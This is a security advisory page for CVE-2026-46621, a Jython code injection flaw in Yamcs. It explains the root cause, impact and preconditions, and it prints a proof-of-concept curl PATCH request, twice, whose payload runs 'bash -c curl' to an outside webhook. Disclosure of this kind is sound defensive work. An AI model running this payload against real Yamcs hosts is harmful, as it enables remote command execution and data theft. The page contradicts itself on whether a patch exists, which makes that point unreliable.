VYPR
← All advisories
Critical severityGHSA Advisory· Published May 27, 2026

Yamcs Vulnerable to Authenticated Remote Code Execution (RCE) via Jython Algorithm Code Injection

CVE-2026-46621

Description

Summary

A Server-Side Code Injection vulnerability exists in the Yamcs script evaluation engine for Python algorithms. The application dynamically compiles and evaluates user-controlled algorithm text using Jython (via the JSR-223 ScriptEngine API) without enforcing a secure sandbox. An authenticated user with the ChangeMissionDatabase privilege can exploit this by overriding the algorithm logic through the REST API, achieving Remote Code Execution (RCE) on the underlying host operating system.

Details

The vulnerability lies in how Yamcs handles dynamic script evaluation. When a user updates an algorithm via the MDB (Mission Database) API (/api/mdb/{instance}/realtime/algorithms/{name}), the AlgorithmManager uses the ScriptAlgorithmExecutorFactory to instantiate a JSR-223 ScriptEngine (in this case, Jython/Python).

Because Jython allows seamless interoperability with native Java classes, an attacker can import and execute arbitrary Java classes such as java.lang.Runtime. Any valid Python algorithm can be overwritten with a malicious payload that executes OS-level commands.

PoC

Prerequisites: 1. A running Yamcs instance with the Jython engine available in its classpath (e.g., jython-standalone dependency included). 2. An active authentication token for a user with the SystemPrivilege.ChangeMissionDatabase privilege. 3. An existing algorithm defined in the Mission Database (MDB) with its language explicitly set to python (e.g., a custom poc algorithm). *Note: Yamcs prevents changing the underlying language engine of an algorithm via the API, so an existing Python algorithm must be targeted.*

Exploitation Steps:

  1. Send an authenticated HTTP PATCH request to the MDB API endpoint to inject the malicious Jython code into the existing Python algorithm. The payload leverages java.lang.Runtime to execute an OS command (e.g., triggering an external webhook or a reverse shell).
    curl -i -X PATCH http://:8090/api/mdb/myproject/realtime/algorithms/myproject/poc \
         -H 'Content-Type: application/json' \
         -H 'Authorization: Bearer <YOUR_AUTH_TOKEN>' \
         -d '{
           "action": "SET",
           "algorithm": {
             "text": "import java.lang.Runtime\njava.lang.Runtime.getRuntime().exec([\"bash\", \"-c\", \"curl https:///RCE\"])\nout0.value = 1.0"
           }
         }'

*(Note: Assigning a valid output like out0.value = 1.0 ensures the algorithm returns the expected data type to the Yamcs internal processor, preventing crash loops and ensuring clean execution).*

  1. Trigger the algorithm evaluation by sending telemetry data that the algorithm depends on (e.g., running the simulator.py script to update the required parameters like Sunsensor).
  1. The Yamcs server compiles the injected text into an executable script on the fly.
  1. Verify that the OS command executed successfully on the host machine by checking the incoming HTTP request on the provided webhook URL.

Impact

It impacts any Yamcs deployment where users are granted the ChangeMissionDatabase privilege and a scripting engine (like Jython) is present in the classpath. An attacker can leverage this to escalate application-level configuration privileges to full System/OS control, leading to arbitrary command execution, data exfiltration, and potential lateral movement within the hosting infrastructure.

Credits

Discovered & reported by Pablo Picurelli Ortiz (@superpegaso2703), cybersecurity student at Universidad Rey Juan Carlos.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Authenticated code injection in Yamcs via Jython script evaluation allows RCE on the host OS.

Vulnerability

A server-side code injection vulnerability exists in the Yamcs script evaluation engine for Python algorithms. The application dynamically compiles and evaluates user-controlled algorithm text using Jython via the JSR-223 ScriptEngine API without enforcing a secure sandbox. An authenticated user with the ChangeMissionDatabase privilege can override algorithm logic through the REST API endpoint /api/mdb/{instance}/realtime/algorithms/{name}. The vulnerability affects Yamcs instances that include the Jython engine in their classpath (e.g., jython-standalone dependency). [1][2]

Exploitation

The attacker must have a valid authentication token for a user with the SystemPrivilege.ChangeMissionDatabase privilege and an existing algorithm in the Mission Database (MDB) whose language is set to python (Yamcs prevents changing the language engine of an algorithm via the API). An authenticated HTTP PATCH request is sent to the MDB API endpoint to inject malicious Jython code into the existing Python algorithm. The payload leverages Java classes accessible from Jython, such as java.lang.Runtime, to execute arbitrary OS commands. [1][2]

Impact

Successful exploitation results in remote code execution (RCE) on the underlying host operating system. The attacker can execute arbitrary OS-level commands with the privileges of the Yamcs process, leading to full compromise of confidentiality, integrity, and availability of the affected system. [1][2]

Mitigation

As of the publication date (2026-05-27), no patch or official fix has been released for CVE-2026-46621. The Yamcs project has been notified and is investigating mitigations. Until a fix is available, administrators should restrict access to the affected API endpoint to only trusted, necessary users and consider removing the Jython engine from the classpath if not required. The vulnerability is not listed on CISA's Known Exploited Vulnerabilities (KEV) catalog as of this writing. [1][2]

References
  1. CVE-2026-46621 - GitHub Advisory Database
  2. Authenticated Remote Code Execution (RCE) via Jython Algorithm Code Injection

AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
org.yamcs:yamcs-coreMaven
< 5.12.75.12.7

Affected products

2
  • Yamcs/YamcsGHSA2 versions
    < 5.12.7+ 1 more
    • (no CPE)range: < 5.12.7
    • (no CPE)

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing secure sandbox enforcement in the Jython ScriptEngine allows user-controlled algorithm text to import and execute arbitrary Java classes such as java.lang.Runtime."

Attack vector

An authenticated attacker with the `ChangeMissionDatabase` privilege sends an HTTP PATCH request to `/api/mdb/{instance}/realtime/algorithms/{name}` with a JSON body containing malicious Jython code in the `algorithm.text` field [ref_id=1][ref_id=2]. The payload imports `java.lang.Runtime` and calls `getRuntime().exec()` to execute OS commands. The attacker must target an existing algorithm whose language is already set to `python`, as the API prevents changing the language engine. After injection, the attacker triggers algorithm evaluation by sending telemetry data that the algorithm depends on, causing the server to compile and execute the malicious script [ref_id=1][ref_id=2].

Affected code

The vulnerability is in the Yamcs script evaluation engine for Python algorithms. When a user updates an algorithm via the MDB API endpoint `/api/mdb/{instance}/realtime/algorithms/{name}`, the `AlgorithmManager` uses `ScriptAlgorithmExecutorFactory` to instantiate a JSR-223 `ScriptEngine` (Jython/Python) without enforcing a secure sandbox [ref_id=1][ref_id=2]. The Jython engine allows seamless interoperability with native Java classes, enabling arbitrary code execution.

What the fix does

The advisory does not provide a patch or specific remediation code [ref_id=1][ref_id=2]. The recommended fix would involve enforcing a secure sandbox around the Jython `ScriptEngine` to prevent access to dangerous Java classes such as `java.lang.Runtime`. Without such a sandbox, any authenticated user with the `ChangeMissionDatabase` privilege can escalate to full OS-level command execution.

Preconditions

  • configA running Yamcs instance with the Jython engine available in its classpath (e.g., jython-standalone dependency included)
  • authAn active authentication token for a user with the SystemPrivilege.ChangeMissionDatabase privilege
  • inputAn existing algorithm defined in the Mission Database (MDB) with its language explicitly set to python
  • networkNetwork access to the Yamcs REST API endpoint /api/mdb/{instance}/realtime/algorithms/{name}

Reproduction

**Prerequisites:** A running Yamcs instance with Jython in its classpath, an auth token for a user with `ChangeMissionDatabase` privilege, and an existing algorithm with language set to `python`. **Steps:** 1. Send an authenticated HTTP PATCH to `/api/mdb/{instance}/realtime/algorithms/{name}` with payload: `{"action":"SET","algorithm":{"text":"import java.lang.Runtime\njava.lang.Runtime.getRuntime().exec([\"bash\",\"-c\",\"curl https://<WEBHOOK>/RCE\"])\nout0.value = 1.0"}}`. 2. Trigger algorithm evaluation by sending telemetry data the algorithm depends on (e.g., running simulator.py to update parameters like `Sunsensor`). 3. Verify OS command execution by checking the webhook for an incoming request [ref_id=1][ref_id=2].

Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

2

News mentions

0

No linked articles in our index yet.